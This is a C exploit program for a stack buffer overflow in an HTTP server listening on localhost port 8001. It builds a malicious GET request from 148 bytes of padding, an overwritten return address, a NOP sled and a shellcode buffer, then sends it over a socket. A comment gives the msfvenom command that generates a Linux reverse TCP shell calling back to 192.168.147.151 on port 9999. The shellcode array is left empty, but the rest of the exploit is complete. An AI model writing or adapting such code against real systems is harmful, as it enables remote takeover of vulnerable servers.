#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <unistd.h>

int main() {

    int sock;
    struct sockaddr_in server;

    char junk[148];
    memset(junk, 'a', 148);

    unsigned int rip = 0xffffcc60;

    unsigned char nops[0x20];
    memset(nops, 0x90, 0x20);


    // msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.147.151 LPORT=9999 -b "\x00\x0a\x0d" -f c
    unsigned char scode[] = "";

    char buffer[2000];
    int offset = 0;

    offset += sprintf(buffer + offset, "GET /");

    memcpy(buffer + offset, junk, sizeof(junk));
    offset += sizeof(junk);

    memcpy(buffer + offset, &rip, 4);
    offset += 4;

    memcpy(buffer + offset, nops, sizeof(nops));
    offset += sizeof(nops);

    memcpy(buffer + offset, scode, sizeof(scode) - 1);
    offset += sizeof(scode) - 1;

    offset += sprintf(buffer + offset, " HTTP/1.1\r\nHost:localhost:8001\r\n\r\n");

    sock = socket(AF_INET, SOCK_STREAM, 0);

    server.sin_family = AF_INET;
    server.sin_port = htons(8001);
    server.sin_addr.s_addr = inet_addr("127.0.0.1");

    connect(sock, (struct sockaddr *)&server, sizeof(server));

    send(sock, buffer, offset, 0);

    char response[4096];
    recv(sock, response, sizeof(response), 0);

    close(sock);

    return 0;
}